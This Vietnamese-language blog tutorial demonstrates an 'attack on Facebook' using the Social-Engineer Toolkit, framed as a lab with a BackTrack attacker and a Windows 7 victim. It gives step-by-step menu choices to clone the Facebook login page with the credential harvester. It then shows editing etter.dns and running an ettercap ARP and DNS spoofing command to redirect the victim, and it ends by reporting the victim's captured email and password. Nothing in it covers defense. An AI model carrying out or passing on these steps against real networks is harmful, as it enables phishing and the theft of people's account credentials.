I.GIỚI THIỆU VỀ
SOCIAL ENGINEERING TOOLKIT.
The social engineering toolkit (set) là một mã nguồn mở. Nó
được thiết kế để thử nghiệm xâm nhập và nghiên cứu bảo mật và có hiệu quả trên
rất nhiều cuộc tấn công social engineering. Bộ công cụ thúc đẩy nhiều hướng tấn
công tận dụng lợi thế của yếu tố con người để
nhắm mục tiêu tấn công.
The Social-Engineer Toolkit là một công cụ có sẵn trong
backtrack. Một số menu của nó như sau:
Select from the menu:
1) Social-Engineering Attacks (Tấn công
Social-Engineering)
2) Fast-Track
Penetration Testing (Kiểm tra bảo mật nhanh)
3) Third Party
Modules ( Các thư viện của tổ chức khác )
4) Update the
Metasploit Framework ( Cập nhật Metasploit )
5) Update the
Social-Engineer Toolkit ( Cập nhật ứng dụng )
6) Help, Credits,
and About (Giúp đỡ)
…
99) Exit the
Social-Engineer Toolkit (Thoát)
set>
II.TẤN CÔNG
FACEBOOK BẰNG CÔNG CỤ SOCIAL ENGINEERING TOOLKIT
1) Chuẩn bị.
2) Thực hiện tấn
công Facebook bằng công cụ Social Engineering Toolkit.
Các bạn chọn 1 để sử dụng nó:
1) Spear-Phishing Attack Vectors (Tấn công dạng lừa đảo email
Spear-Phishing)
2) Website Attack
Vectors ( Tấn công dựa trên lỗ hổng web
)
3) Infectious Media
Generator ( Tạo những file media độc )
4) Create a Payload
and Listener ( Tạo payload tấn công và cài mã độc)
5) Mass Mailer
Attack ( Gửi email hàng loạt )
6) Arduino-Based
Attack Vector ( Tấn công dựa trên Arduino )
7) SMS Spoofing
Attack Vector ( Tấn công mạo danh SMS )
8) Wireless Access
Point Attack Vector ( Tấn công mạng không dây )
9) QRCode Generator
Attack Vector ( Tạo các mã QR độc )
10) Third Party
Modules ( Các thư viện của tổ chức khác )
…
99) Return back to
the main menu. ( Quay về menu chính )
II.TẤN CÔNG
FACEBOOK BẰNG CÔNG CỤ SOCIAL ENGINEERING TOOLKIT
1) Chuẩn bị.
- Một máy BackTrack 5 R3 làm máy Attacker.
- Một máy Windows 7 làm máy victim.
2) Thực hiện tấn
công Facebook bằng công cụ Social Engineering Toolkit.
Thực hiện giả mạo Website sử dụng công cụ Social Engineering
Toolkit ta gõ 2 lệnh sau:
#
cd /pentest/exploits/set/
#
./set
Sau đó tiếp tục gõ yes và cho ra kết quả như hình bên dưới:
Ta chọn 1 (Social-Engineering Attacks) rồi tiếp tục chọn 2
(Website Attack Vectors)
Tiếp tục chọn 3 (Credential Harverster Attack Method)
Sau
đó chọn 2 (Site Cloner)
Tiếp
tục ta nhập IP máy Attacker vào rồi sau đó nhập địa chỉ web facebook là www.facebook.com
vào (đây chính là website Attacker sẽ giả mạo). Kết quả giống hình bên dưới:
Giờ
ta sẽ thực hiện điều hướng và giả mạo DNS. Ta gõ dòng lệnh sau:
# locate etter.dns
Ta
gõ tiếp dòng lệnh sau để vào cấu hình giả mạo DNS đánh lừa người dùng:
# vi /usr/local/share/etter.dns
Ta
thay thế toàn bộ địa chỉ cũ thành địa chỉ của attacker rồi lưu lại. Ta được kết
quả như hình dưới đây:
Bắt
đầu quá trình giả mạo DNS bằng lệnh sau:
# ettercap –Tqi eth0 –P dns_spoof
–M arp // //
Và
đưa ra kết quả như hình bên dưới:
Chuyển
sang máy victim và thực hiện đăng nhập vào facebook
Giờ
ta quay lại máy attacker và đã thu được thành quả. Ta đã có được user và
password facebook của nạn nhân.
Ở
hình bên dưới ta có được email đăng nhập và password của nạn nhân, vậy là đã
thành công.
Video hướng dẫn:
Hãy để lại bình luận của bạn:











